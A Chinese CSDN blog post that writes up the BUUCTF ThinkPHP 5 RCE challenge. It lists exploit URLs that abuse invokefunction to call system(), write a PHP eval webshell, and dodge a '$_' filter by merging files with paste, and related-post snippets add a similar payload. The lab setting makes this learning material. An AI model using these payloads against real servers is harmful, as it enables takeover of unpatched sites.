BUUCTF之[ThinkPHP]5-Rce WP及getShell的新姿势

最新推荐文章于 2024-05-28 18:22:36 发布
最新推荐文章于 2024-05-28 18:22:36 发布
阅读量2.8k 收藏 5
点赞数 1
分类专栏: CTF web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuaicenglou3032/article/details/109002651
版权

题目给了提示:

https://github.com/vulhub/vulhub/blob/master/thinkphp/5-rce

照上面的POC做就能在phpinfo中找到flag,此处不再赘述。

拿到flag之后我想通过这个payload拿一波webshell,故使用以下POC写一句话,先创建一个php文件:

http://xxxxxxxxx/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=touch fuck.php

然后用echo写入一句话:

http://xxxxxxxxxxx/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>">>fuck.php

蚁剑连接发现失败,浏览器访问这个一句话看看怎么回事:

发现$_POST被过滤掉了,经过测试,只要检测到$_这样的字符串,其后面的字符会被过滤掉一部分,具体的正则我没多做测试,再试试echo "<?php @eval(POST['cmd']);?>">>fuck.php:

POST没有被过滤,说明过滤的只是$_

百度了一下,决定使用paste命令绕过这个过滤。具体执行方式如下:

先创建一个a.php,其内容如下:

再创建一个b.php,其内容如下:

这时我们使用带-d参数的paste命令:

http://xxxxxxxx7/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=paste -d $ a.php b.php > c.php

再来看看c.php的内容:

成功写进了一句话,蚁剑连接成功:

本次解锁新姿势,不需要base64编码,但是需要支持system,同时系统得有paste命令才行。

------------end------------

KogRow
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
BUUCTF-thinkPHP5 RCE
朋克归零膏的博客
10-12 438
real题目我认为getflag是没意义的,幸运的是能从中学到一些技巧。在用大佬的poc对比官方的poc有一个细节。这题在尝试用命令执行写一句话的时候发现输入。,因此思路应该是将一句话分成两段然后拼一起。会被替换成空字符但是能单独写。
buuctf [ThinkPHP]5-Rce
qq_1873822的博客
03-14 1758
大佬们都是直接rce 这里漏洞技术细节(涉及代码段、原理等)我上个链接 https://blog.csdn.net/ArrowQin/article/details/105913146 https://bbs.ichunqiu.com/thread-48687-1-1.html?tdsourcetag=s_pcqq_aiomsg 解题 版本是ThinkPHP V5.0.20 poc ?s=index/\think\app/invokefunction&function=call_user_fun.
[CTF_网络安全] 攻防世界 php_rce 解题详析
Z4400840的博客
05-24 1108
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),攻击者通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。下面简单介绍一种常见的远程 RCE 漏洞利用方式,即利用 PHP 中的eval函数实现 RCE 的方式。
buuctf-Real-[ThinkPHP]5-Rce
weixin_46079186的博客
05-09 524
题目地址 是ThinkPHP v5这么有名的漏洞,直接网上找poc 找到poc 复制粘贴一下 可以执行phpinfo ,尝试执行以下其他命令 找了一会没找到,直接写了一个shell 进去找,linux shell脚本原因会过滤$_POST,所以要加\转义 使用蚁剑连接 找了半天,flag就在phpinfo里面。。。。。 ...
BUUCTF-Real-[ThinkPHP]5-Rce
分享
01-31 776
多积累漏洞利用经验!
BuuCTF [Think php]5-Rce手教程
最新发布
wwwyydshen的博客
05-28 397
这里避免手踩坑我用红框框,框出了你所需要输入端口的地方,这里我们打开了页面,看到页面的第一反应就是查看一下它的源代码,这里我用的浏览器是主机上普通的浏览器,因为这道题不需要抓包所以咱们就简单点,不需要用kali也可以。flag居然藏在这里,藏的好深,得一直往下滑才能找到,哈哈别再傻傻的划着找了,找到键盘上的ctrl+f 上面会出现一个小框框直接搜flag就找到它了!在这里我们不要放过任何一个细节,我省略了找的过程,因为很麻烦但是我的建议还是多做尝试,尝试过后可以学到更多的东西。
thinkphp5.X-Batch-getshell-master.rar
03-31
《深入剖析ThinkPHP5.x批量getshell漏洞及防范策略》 在网络安全领域,尤其是Web应用安全方面,"getshell"一词通常意味着攻击者成功获得了服务器的命令执行权限,能够执行任意系统命令,对服务器造成严重威胁。针对...
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
ThinkPHP_getshell-v2.zip
11-11
标题“ThinkPHP_getshell-v2.zip”提示我们关注的是与ThinkPHP框架相关的安全问题,特别是一个可能导致getshell的漏洞。Getshell通常指的是攻击者能够通过某种方式在目标服务器上执行命令,这通常与代码注入漏洞相关...
thinkphp5-使用SimHash进行海量内容数据查重
09-28
本篇文章将详细探讨如何在ThinkPHP5中利用SimHash算法进行海量内容数据的查重。 SimHash是一种基于汉明距离的分布式相似性检测算法,由Charikar于2002年提出。它的核心思想是将任意长度的文本或数据转化为固定长度...
thinkphp5-swoole 数据库连接池实现
08-06
基于tp5的swoole支持,对th5的connection进行改造,使用Swoole\Coroutine\MySQL重写了基于swoole的PDO接口,实现了mysql的数据库连接池,本地测试可用。使用时,替换thinkphp/library/think/db/Connection.php,并...
BUUCTFThinkPHP做题记录
qq_51558360的博客
03-08 255
[PHP]XXE 打开就是phpinfo()界面,尝试搜索flag 没想到真的有 [ThinkPHP]5-Rce
thinkphp/5.0.23-rce漏洞复现
qq_46804551的博客
04-22 897
环境搭建 访问your-ip:8080 环境搭建成功 漏洞复现 thinkphp 5.0.23(完整版)debug模式 32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx thinkphp 5.0.23(完整版) 33、(post)public/index.php?s=captcha (data) _method=__co
Thinkphp 5.1.41 getshell
qq_41619801的博客
06-23 1752
首先需要实现反序列化,找到传参数的位置。影响thinkphp 5.1.37——5.1.41测试可以自己实现一个函数为了实现反序列化自动执行的魔法函数,要找到一个析构函数,thinkphp\library\think\process\pipes\Windows.php中有一个继续跟进removeFiles()file_exists会将$filename当作字符串进行处理,触发任意类的__toString()这时候需要找到一个__toString函数能继续向下执行的类,全局搜索。
thinkphp 5-rce(rce漏洞getshell
weixin_51692662的博客
11-03 2810
thinkphp 5-rce(rce漏洞getshell
【web安全】DolphinPHP RCE漏洞分析
HBohan的博客
04-07 3823
DolphinPHP DolphinPHP(海豚PHP)是一个基于ThinkPHP5.1.41LTS开发的一套开源PHP快速开发框架,DolphinPHP秉承极简、极速、极致的开发理念,为开发集成了基于数据-角色的权限管理机制,集成多种灵活快速构建工具,可方便快速扩展的模块、插件、钩子、数据包。统一了模块、插件、钩子、数据包之间的版本和依赖关系,进一步降低了代码和数据的冗余,以方便开发者快速构建自己的应用。 漏洞分析 看到application\common.php#action_log函数 观察到有
JAVA正则表达式语法大全
iteye_20632的博客
09-29 92
[正则表达式]文本框输入内容控制 整数或者小数:^[0-9]+\.{0,1}[0-9]{0,2}$ 只能输入数字:"^[0-9]*$"。 只能输入n位的数字:"^\d{n}$"。 只能输入至少n位的数字:"^\d{n,}$"。 只能输入m~n位的数字:。"^\d{m,n}$" 只能输入零和非零开头的数字:"^(0|[1-9][0-9]*)$"。 只能输入有两位小数的正实数:"^[0-.
BUUCTF REAL
A_dmin的博客
01-30 4304
BUUCTF REAL flag好像都在系统环境变量中,phpinfo中就能看见,,,, [PHP]XXE libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡 dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞 payload: <?xml version="1.0" encoding="utf-...
ThinkPHP 5.x RCE分析
0verWatch的博客
02-15 6037
第一次进行代码量这么大的分析,记录一下,个人感觉手真的不适应这种,应该找点小一点的cms去分析,如果不懂MVC架构真的可能会懵。。。 前言 在分析这个之前还看了两篇tp5的RCE漏洞,这两个洞都是很相似的,都是利用一个可控的变量dispatch去实现到最后还是构造出回调函数,可以学习一下,感觉这里面的思路就是本文分析漏洞的来源 https://xz.aliyun.com/t/3845 https...
thinkphp2-rce
07-28
ThinkPHP 2.x版本中存在远程代码执行(RCE)漏洞。该漏洞可以通过构造恶意的请求来执行任意的PHP代码。具体来说,漏洞出现在ThinkPHP框架中的路由处理函数中,使用了不安全的preg_replace函数,并且使用了/e模式进行正则表达式匹配。攻击者可以通过在请求中注入恶意的代码来执行任意的PHP代码。这个漏洞在ThinkPHP框架的Dispatcher类中的102行被触发。\[2\]\[3\] 为了修复这个漏洞,建议升级到最版本的ThinkPHP框架,或者手动修复代码中的漏洞。具体修复方法包括使用更安全的正则表达式替代preg_replace函数,并且避免使用/e模式进行正则表达式匹配。此外,还应该对用户输入进行严格的过滤和验证,以防止恶意代码的注入。 #### 引用[.reference_title] - *1* [【漏洞复现】[ThinkPHP]2-Rce](https://blog.csdn.net/Mr_atopos/article/details/124907676)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [ThinkPHP2-RCE漏洞复现](https://blog.csdn.net/qq_51459600/article/details/125179451)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值